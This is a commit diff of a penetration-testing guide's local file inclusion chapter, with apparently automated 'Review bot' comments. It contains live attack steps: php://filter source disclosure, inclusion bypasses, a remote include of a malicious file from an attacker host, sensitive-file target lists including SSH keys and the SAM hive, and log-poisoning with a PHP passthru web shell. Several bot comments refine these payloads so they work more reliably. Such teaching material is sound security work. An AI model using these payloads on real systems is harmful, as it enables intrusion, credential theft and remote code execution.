Commit 003b937c authored by bobloblaw's avatar bobloblaw

Updates local_file_inclusion.md

Auto commit by GitBook Editor
parent ef8dc182
+108 −108
@@ -22,7 +22,7 @@
        * networking
    * [Firewalls](firewalls.md)
    * [General tips and tricks](general_tips.md)
* [Recon/information gathering phase](scanning.md)
* [Recon\/information gathering phase](scanning.md)
    * [Passive information gatherig](passive_information_gatherig.md)
        * [Email Harvesting](email_harvesting.md)
        * [Users](users.md)
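Review bot: the `\/` introduced on the `Recon\/information gathering phase` line is editor-added escaping rather than a content change; CommonMark treats `\/` as an escaped slash and renders `/`, but classic Markdown renderers print the backslash literally, so the portable form is the original `Recon/information gathering phase`. The same auto-escape appears in the other table-of-contents hunks below.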
@@ -35,7 +35,7 @@
            * [DNS Zone Transfer Attack](dns_zone_transfer_attack.md)
* [Vulnerability analysis](vulnerability_analysi1s.md)
    * Server-side vulnerabilities
       * [Common ports/services and how to use them](list_of_common_ports.md)
        * [Common ports\/services and how to use them](list_of_common_ports.md)
        * [Port Knocking](port_knocking.md)
    * [Client-side vulnerabilities](web-services.md)
        * [Common web-services](common_web-services.md)
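Review bot: the unchanged context line `* [Vulnerability analysis](vulnerability_analysi1s.md)` points at a file name with a stray `1` in `analysi1s`; if the file on disk really carries that name, this is the place to rename both the file and the link to `vulnerability_analysis.md`, otherwise the link is already broken.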
@@ -53,7 +53,7 @@
        * [Attacking the user](attacking_the_user.md)
            * [Clickjacking](clickjacking.md)
            * [Broken authentication or session management](broken_authentication_or_session_management.md)
           * [Text/content-injection](text-injection.md)
            * [Text\/content-injection](text-injection.md)
            * [Subdomain takeover](subdomain_takeover.md)
            * [Cross Site Request Forgery](cross_site_request_forgery.md)
            * [Cross-site-scripting](cross-site-scripting.md)
@@ -89,7 +89,7 @@
* [Binary Exploitation](binary_exploitation2.md)
    * [Tools](tools.md)
    * [Basics of assembly](binary_exploitation.md)
   * [Buffer overflow (BOF)](buffer_overflow_bof.md)
    * [Buffer overflow \(BOF\)](buffer_overflow_bof.md)
    * [Vulnerabilities](vulnerabilities.md)
    * [Exploit examples and tutorials](exploit_examples_and_tutorials.md)
    * [Setuid c-code](setuid_c-code.md)
+10 −9
# General tips


## Disposable email

If you are signing up for a lot of accounts you can use a disposible email. You just enter the email account you want for that second, and then you can view it. But remember, so can everyone else.  
https://www.mailinator.com

[https://www.mailinator.com](https://www.mailinator.com)

## Base64 encode/decode

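Review bot: `disposible` on the context line should be `disposable`, and the warning `But remember, so can everyone else` deserves to be made concrete: a Mailinator inbox is public and unauthenticated, so anything that lands there (password-reset links, verification codes, credentials) is readable by anyone who guesses the address; use it only for throwaway sign-ups that never receive secrets.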
@@ -17,15 +15,18 @@ print encoded

decoded = base64.b64decode("aGVqc2Fu")
print decoded

```

## Default passwords

http://www.defaultpassword.com/

[http://www.defaultpassword.com/](http://www.defaultpassword.com/)

## Getting GUI on machine that does not have RDP or VNC

You can forward X over SSH.  
http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html
 No newline at end of file
[http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html](http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html)




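Review bot: the base64 snippet in this hunk still uses the Python 2 statement form (`print encoded`, `print decoded`), which is a syntax error on Python 3; change both to `print(encoded)` and `print(decoded)`, and note that `b64decode` returns bytes on Python 3, so the decoded value prints as `b'...'` unless it is `.decode()`d first. The four blank lines appended after the X-over-SSH link are trailing-whitespace churn from the editor and can be dropped.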
+76 −70
@@ -4,29 +4,25 @@ Local file inclusion means unauthorized access to filesystem.

With this we can get a hold of many sensitive files



In most web-services that use a database we can get a hold of the database username and password:


in wordpress the file is **wp-config.php**  
And once you have gotten access to that you can do other things. Check out the chapter on mysql.


This is the definitive guide to Local File inclusion  
https://highon.coffee/blog/lfi-cheat-sheet/
[https://highon.coffee/blog/lfi-cheat-sheet/](https://highon.coffee/blog/lfi-cheat-sheet/)

And this  
http://securityidiots.com/Web-Pentest/LFI
[http://securityidiots.com/Web-Pentest/LFI](http://securityidiots.com/Web-Pentest/LFI)

And this:

https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

[https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/](https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/)

The vulnerability stems from unsanitized user-input

Here is an example of php-code vulnerable to LFI. As you can see we just pass in the url-parameter into the require-function without any sanitization. So the user can just add the path to any file.

```
# index.php
    <?php
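Review bot: the opening context line `Local file inclusion means unauthorized access to filesystem.` understates the bug; the hunk itself says the parameter goes straight into `require`, so an included file is not just read but executed as PHP, which is exactly why the log-poisoning and `/proc/self/environ` sections later in this file end in a shell. Suggested wording: `Local file inclusion means an attacker controls the path passed to include/require, so the server reads and executes a file of their choosing.` The `wp-config.php` mention should also say where the file lives (the WordPress install root, or one directory above it) so the reader knows which path to request.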
@@ -42,15 +38,16 @@ So if you an LFI you might have notices that you can read txt-files but not .php
```
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
```

Here you use a php-filter to convert it all into base64. So in return you get the whole page base64 encoded. Now you only need to decode it. Save the base64-text into a file and then run:

```
base64 -d savefile.php
```

### Using the nullbyte handeling .php
### Bypassing .php and other extra file-endings

THe nullbyte techniqu works in versions below php 5.3. So look out for that.
The nullbyte technique works in versions below php 5.3. So look out for that.

If the include looks like this:

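Review bot: `The nullbyte technique works in versions below php 5.3` is off by a patch release: PHP started rejecting NUL bytes in filesystem paths in 5.3.4, so 5.3.0 through 5.3.3 are still affected, and on any version `magic_quotes_gpc = On` turns `%00` into an escaped `\0` that no longer truncates the path. It is also worth stating under the `php://filter` example that `resource=index` only works because the application appends `.php` itself; against a script that includes the raw parameter the resource must be `index.php`.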
@@ -64,6 +61,10 @@ If the include looks like this:

The php i added to the filename, this will mean that we will not be able to find the files we are looking for. Since the file /etc/passwd.php does not exist. However, if we add the nullbyte to the end of our attack-string the **.php** will not be taken into account. So we add **%00** to the end of our attackstring.

As noted above this wll only work for php below 5.3. So another way to deal with it is just to add a question mark.This way the stuff after gets interpreted as a paramter and therefore excluded.

`http://example.com/page=http://192.168.1.101/maliciousfile.txt?`

## Linux

### Tricks
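Review bot: the `?` trick in this hunk only applies to remote inclusion: with `http://192.168.1.101/maliciousfile.txt?` the appended `.php` becomes a query string that the attacker's web server ignores, but for a local path `?` is an ordinary filename character and the include still fails. Remote inclusion in turn needs `allow_url_include = On` (and `allow_url_fopen`), which the text should say. The example URL is also missing the vulnerable script and parameter name after the host; consistent with the rest of the file it should read `http://example.com/index.php?page=http://192.168.1.101/maliciousfile.txt?`. Typos on the same lines: `The php i added`, `wll`, `paramter`.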
@@ -83,12 +84,10 @@ curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile
```


### Sensitive file

This is the default layout of important apache files.  
https://wiki.apache.org/httpd/DistrosDefaultLayout

[https://wiki.apache.org/httpd/DistrosDefaultLayout](https://wiki.apache.org/httpd/DistrosDefaultLayout)

```
/etc/issue (A message or system identification to be printed before the login prompt.)
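Review bot: `### Sensitive file` should be the plural `Sensitive files` to match the list it heads. In the curl examples above it, quote the URL (`curl -s 'http://example.com/gallery.php?page=/etc/passwd' -b cookiefile`): `?` is a shell glob character, and any later example that carries `&cmd=` would otherwise be backgrounded by the shell.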
@@ -102,14 +101,15 @@ https://wiki.apache.org/httpd/DistrosDefaultLayout
$USER/.bash_history or .profile
/root/.bash_history or .profile
```
Comes from here: https://gist.github.com/sckalath/a8fd4e754a72015aa0b8

Comes from here: [https://gist.github.com/sckalath/a8fd4e754a72015aa0b8](https://gist.github.com/sckalath/a8fd4e754a72015aa0b8)

/etc/mtab  
/etc/inetd.conf  
/var/log/dmessage


#### Web server files

```
# Usually found in the root of the website
.htaccess
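Review bot: `/var/log/dmessage` is not a file; the kernel boot log, on distributions that write one, is `/var/log/dmesg`. The three paths `/etc/mtab`, `/etc/inetd.conf` and `/var/log/dmessage` also sit outside the fenced block that closes just above them, so they render as prose rather than as part of the path list; move them inside the fence.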
@@ -117,6 +117,7 @@ config.php
```

#### SSH

```
authorized_keys
id_rsa
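Review bot: the SSH entries `authorized_keys`, `id_rsa` and `id_rsa.pub` are bare file names, which is not enough for an LFI request; give the absolute paths the include needs, `/root/.ssh/id_rsa` and `/home/<user>/.ssh/authorized_keys`, with `<user>` taken from `/etc/passwd` as the `General files` section below already advises.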
@@ -124,7 +125,9 @@ id_rsa.keystore
id_rsa.pub
known_hosts
```

#### Logs

```
/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
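Review bot: `/etc/httpd/logs/acces_log` is misspelled; Apache's default is `access_log`, matching `error_log` on the next line. A wrong name here fails silently and looks exactly like a path that does not exist, so the reader would wrongly conclude the log is unreadable.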
@@ -142,6 +145,7 @@ known_hosts
#### General files

First you need to check the passwd file to find the users.

```
cat /etc/passwd
cat /etc/group
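Review bot: `cat /etc/passwd` and `cat /etc/group` read as shell commands, but under `First you need to check the passwd file` the reader has an LFI, not a shell; list the bare paths (`/etc/passwd`, `/etc/group`) to feed into the include parameter, consistent with the other path lists in this file.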
@@ -163,9 +167,10 @@ Found in the home-directory

"Under Linux, /proc includes a directory for each running process, including kernel processes, in directories named /proc/PID, where PID is the process number. Each directory contains information about one process, including: /proc/PID/cmdline, the command that originally started the process."

https://en.wikipedia.org/wiki/Procfs
[https://en.wikipedia.org/wiki/Procfs](https://en.wikipedia.org/wiki/Procfs)

[https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/](https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/)

https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/
```
/proc/sched_debug # Can be used to see what processes the machine is running
/proc/mounts
@@ -178,17 +183,16 @@ https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/
/proc/self/environ
```

## Bruteforcing SSH known_hosts

https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/
## Bruteforcing SSH known\_hosts

[https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known\_hosts-files/](https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/)

## LFI to shell

Under the right circumstances you might be able to get a shell from a LFI


### Log files

There are some requirements. We need to be able to read the apache2 log files, either the success.log or the error.log

So once you have found a LFI vuln you have to inject php-code into the log file and then execute it.
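Review bot: `either the success.log or the error.log` names a log Apache does not write; the request log is the access log (`/var/log/apache2/access.log` on Debian/Ubuntu, `access_log` elsewhere), which is also the file the execution step in this section uses. The heading escape `known\_hosts` is editor churn: CommonMark renders it as `known_hosts`, but the plain form is more portable.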
@@ -212,8 +216,8 @@ Host: 192.168.1.102
Connection: close
```


Or in the referer parameter.

```
GET / HTTP/1.1
Referer: <? passthru($_GET[cmd]) ?>
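Review bot: `Referer: <? passthru($_GET[cmd]) ?>` depends on `short_open_tag = On` and on PHP resolving the bare word `cmd` to a string, which is only a notice up to PHP 7 and a fatal `Error` on PHP 8. Make the payload `<?php passthru($_GET['cmd']); ?>` so it works regardless of either setting.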
@@ -221,55 +225,57 @@ Host: 192.168.1.159
Connection: close
```

2. Execute it
1. Execute it
   In the browser:
   ```
   http://192.168.1.102/index.php?/var/log/apache2/access.log&cmd=id
   ```


### /proc/self/environ

We can also inject code into /proc/self/environ through the user-agent

https://www.exploit-db.com/papers/12992/
[https://www.exploit-db.com/papers/12992/](https://www.exploit-db.com/papers/12992/)

[https://www.youtube.com/watch?v=ttTVNcPnsJY](https://www.youtube.com/watch?v=ttTVNcPnsJY)

## Windows

https://www.youtube.com/watch?v=ttTVNcPnsJY
* Fingerprinting

## Windows
  _:\boot.ini  
    _:\WINDOWS\win.ini  
    _:\WINNT\win.ini  
    _:\WINDOWS\Repair\SAM  
    _:\WINDOWS\php.ini  
    _:\WINNT\php.ini  
    _:\Program Files\Apache Group\Apache\conf\httpd.conf  
    _:\Program Files\Apache Group\Apache2\conf\httpd.conf  
    _:\Program Files\xampp\apache\conf\httpd.conf  
    _:\php\php.ini  
    _:\php5\php.ini  
    _:\php4\php.ini  
    _:\apache\php\php.ini  
    _:\xampp\apache\bin\php.ini  
    _:\home2\bin\stable\apache\php.ini  
    _:\home\bin\stable\apache\php.ini

* Logs

  _:\Program Files\Apache Group\Apache\logs\access.log  
    _:\Program Files\Apache Group\Apache\logs\error.log

* PHP Session Locations

  _:\WINDOWS\TEMP\  
    _:\php\sessions\  
    _:\php5\sessions\  
    _:\php4\sessions\

- Fingerprinting

    *:\boot.ini
    *:\WINDOWS\win.ini
    *:\WINNT\win.ini
    *:\WINDOWS\Repair\SAM
    *:\WINDOWS\php.ini
    *:\WINNT\php.ini
    *:\Program Files\Apache Group\Apache\conf\httpd.conf
    *:\Program Files\Apache Group\Apache2\conf\httpd.conf
    *:\Program Files\xampp\apache\conf\httpd.conf
    *:\php\php.ini
    *:\php5\php.ini
    *:\php4\php.ini
    *:\apache\php\php.ini
    *:\xampp\apache\bin\php.ini
    *:\home2\bin\stable\apache\php.ini
    *:\home\bin\stable\apache\php.ini

- Logs

    *:\Program Files\Apache Group\Apache\logs\access.log
    *:\Program Files\Apache Group\Apache\logs\error.log

- PHP Session Locations

    *:\WINDOWS\TEMP\
    *:\php\sessions\
    *:\php5\sessions\
    *:\php4\sessions\

## References:
https://nets.ec/File_Inclusion
https://gist.github.com/sckalath/da1a232f362a700ab459
 No newline at end of file

[https://nets.ec/File\_Inclusion](https://nets.ec/File_Inclusion)  
[https://gist.github.com/sckalath/da1a232f362a700ab459](https://gist.github.com/sckalath/da1a232f362a700ab459)

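Review bot: the execution URL `http://192.168.1.102/index.php?/var/log/apache2/access.log&cmd=id` is missing the parameter name, so as written the log path is never handed to the include; it should be `http://192.168.1.102/index.php?page=/var/log/apache2/access.log&cmd=id` (using whatever parameter the target actually includes). In the Windows list the drive placeholder changes between the two versions (`_:\boot.ini` versus `*:\boot.ini`); neither is a literal path, so say once that the leading character stands for the drive letter and that `C:` is the usual value. `\WINDOWS\Repair\SAM` is the backup copy of the SAM hive and is the high-value read in that list, worth calling out.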
random-stuff.md

0 → 100644
+0 −0

Empty file added.